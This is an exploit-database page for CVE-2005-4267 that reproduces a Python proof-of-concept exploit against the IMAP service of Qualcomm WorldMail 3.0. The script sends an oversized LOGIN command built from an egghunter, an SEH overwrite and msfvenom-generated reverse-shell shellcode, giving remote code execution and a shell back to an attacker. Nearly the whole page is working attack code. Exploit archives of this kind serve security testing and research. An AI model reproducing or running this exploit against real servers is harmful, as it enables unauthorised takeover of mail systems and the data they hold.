Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command
CVE
Category
Price
Severity
CVE-2005-4267
CWE-119
Unknown
High
Author
Risk
Exploitation Type
Date
Cesar Cerrudo
High
Remote
2020-06-13
CPE
cpe:cpe:/a:qualcomm:worldmail:3.0.039:imapd
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060053 Below is a copy:
Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command # Exploit Title: Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command
# Buffer overflow in Qualcomm WorldMail 3.0 and earlier allows remote attackers to execute arbitrary code via a long character "}" request in LOGIN.
# Exploit Author: Sarang Tumne @SarT
# Date: 13th June, 2020
# CVE ID: CVE-2005-4267
# Confirmed on release 3.0
# Vendor: https://www.qualcomm.com/
###############################################
import socket
import time
a=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
a.connect(("192.168.56.112",143))
buffer="A"*687
buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
buffer+="B"*50
buffer+="\xEB\xb6\x90\x90" #nseh
buffer+="\xe7\xb2\x0d\x60" #PPR
#buffer+="\x90"*30
buffer+="w00tw00t"
buffer+="\x90"*40
buffer+=("\x89\xe1\xdb\xc2\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" #msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f c -b "\x00\x0a\x0d" EXITFUNC=seh -e x86/alpha_mixed
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x48\x68\x6c\x42\x35\x50\x65\x50\x53\x30\x75\x30\x4c"
"\x49\x6a\x45\x46\x51\x39\x50\x55\x34\x6e\x6b\x56\x30\x50\x30"
"\x4c\x4b\x50\x52\x66\x6c\x4e\x6b\x32\x72\x76\x74\x4c\x4b\x31"
"\x62\x67\x58\x64\x4f\x78\x37\x42\x6a\x51\x36\x75\x61\x59\x6f"
"\x6e\x4c\x45\x6c\x65\x31\x53\x4c\x54\x42\x54\x6c\x37\x50\x4f"
"\x31\x48\x4f\x34\x4d\x55\x51\x39\x57\x38\x62\x4a\x52\x53\x62"
"\x53\x67\x6c\x4b\x56\x32\x72\x30\x4c\x4b\x31\x5a\x77\x4c\x4e"
"\x6b\x30\x4c\x67\x61\x34\x38\x4d\x33\x47\x38\x37\x71\x6e\x31"
"\x33\x61\x6c\x4b\x73\x69\x61\x30\x56\x61\x69\x43\x4e\x6b\x47"
"\x39\x44\x58\x49\x73\x77\x4a\x50\x49\x6c\x4b\x64\x74\x4c\x4b"
"\x77\x71\x39\x46\x75\x61\x69\x6f\x6c\x6c\x7a\x61\x68\x4f\x54"
"\x4d\x55\x51\x78\x47\x37\x48\x39\x70\x71\x65\x4c\x36\x75\x53"
"\x73\x4d\x78\x78\x47\x4b\x33\x4d\x44\x64\x61\x65\x58\x64\x51"
"\x48\x4e\x6b\x70\x58\x74\x64\x55\x51\x79\x43\x70\x66\x6c\x4b"
"\x64\x4c\x52\x6b\x4c\x4b\x30\x58\x77\x6c\x55\x51\x6b\x63\x6c"
"\x4b\x36\x64\x6e\x6b\x36\x61\x68\x50\x4f\x79\x63\x74\x67\x54"
"\x61\x34\x51\x4b\x61\x4b\x50\x61\x70\x59\x63\x6a\x36\x31\x79"
"\x6f\x59\x70\x63\x6f\x63\x6f\x52\x7a\x6e\x6b\x72\x32\x6a\x4b"
"\x6c\x4d\x63\x6d\x43\x58\x74\x73\x47\x42\x67\x70\x37\x70\x72"
"\x48\x44\x37\x30\x73\x76\x52\x61\x4f\x33\x64\x55\x38\x42\x6c"
"\x53\x47\x56\x46\x37\x77\x4b\x4f\x5a\x75\x68\x38\x6c\x50\x46"
"\x61\x35\x50\x57\x70\x56\x49\x39\x54\x32\x74\x46\x30\x43\x58"
"\x46\x49\x4f\x70\x32\x4b\x47\x70\x49\x6f\x69\x45\x62\x70\x32"
"\x70\x70\x50\x72\x70\x71\x50\x62\x70\x67\x30\x42\x70\x51\x78"
"\x5a\x4a\x74\x4f\x39\x4f\x6d\x30\x59\x6f\x69\x45\x4a\x37\x53"
"\x5a\x44\x45\x33\x58\x49\x50\x6c\x68\x55\x68\x50\x6c\x52\x48"
"\x34\x42\x45\x50\x62\x31\x71\x4c\x6c\x49\x48\x66\x43\x5a\x74"
"\x50\x61\x46\x52\x77\x61\x78\x6c\x59\x4c\x65\x33\x44\x51\x71"
"\x49\x6f\x48\x55\x4e\x65\x49\x50\x71\x64\x76\x6c\x4b\x4f\x32"
"\x6e\x45\x58\x54\x35\x78\x6c\x70\x68\x6c\x30\x38\x35\x59\x32"
"\x61\x46\x6b\x4f\x79\x45\x72\x48\x52\x43\x42\x4d\x32\x44\x55"
"\x50\x6d\x59\x6a\x43\x42\x77\x32\x77\x32\x77\x75\x61\x48\x76"
"\x42\x4a\x72\x32\x42\x79\x73\x66\x68\x62\x49\x6d\x35\x36\x4a"
"\x67\x31\x54\x77\x54\x75\x6c\x46\x61\x37\x71\x4c\x4d\x53\x74"
"\x47\x54\x56\x70\x38\x46\x35\x50\x57\x34\x63\x64\x56\x30\x51"
"\x46\x53\x66\x42\x76\x77\x36\x36\x36\x30\x4e\x46\x36\x51\x46"
"\x51\x43\x51\x46\x45\x38\x62\x59\x78\x4c\x75\x6f\x4e\x66\x79"
"\x6f\x4b\x65\x4c\x49\x49\x70\x30\x4e\x76\x36\x62\x66\x6b\x4f"
"\x74\x70\x42\x48\x63\x38\x4e\x67\x47\x6d\x63\x50\x79\x6f\x4e"
"\x35\x6f\x4b\x49\x6e\x56\x6e\x54\x72\x48\x6a\x72\x48\x49\x36"
"\x6e\x75\x4d\x6d\x4d\x4d\x39\x6f\x4e\x35\x75\x6c\x63\x36\x63"
"\x4c\x46\x6a\x6b\x30\x59\x6b\x69\x70\x43\x45\x36\x65\x4d\x6b"
"\x51\x57\x52\x33\x64\x32\x72\x4f\x70\x6a\x45\x50\x33\x63\x39"
"\x6f\x4a\x75\x41\x41")
#buffer+="\x90"*40
junk=("}")*300
#buffer+="B"*4
#buffer+="C"*500
a.send("A001 LOGIN "+buffer+junk+"\r\n")
print a.recv(50000)
a.close()
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum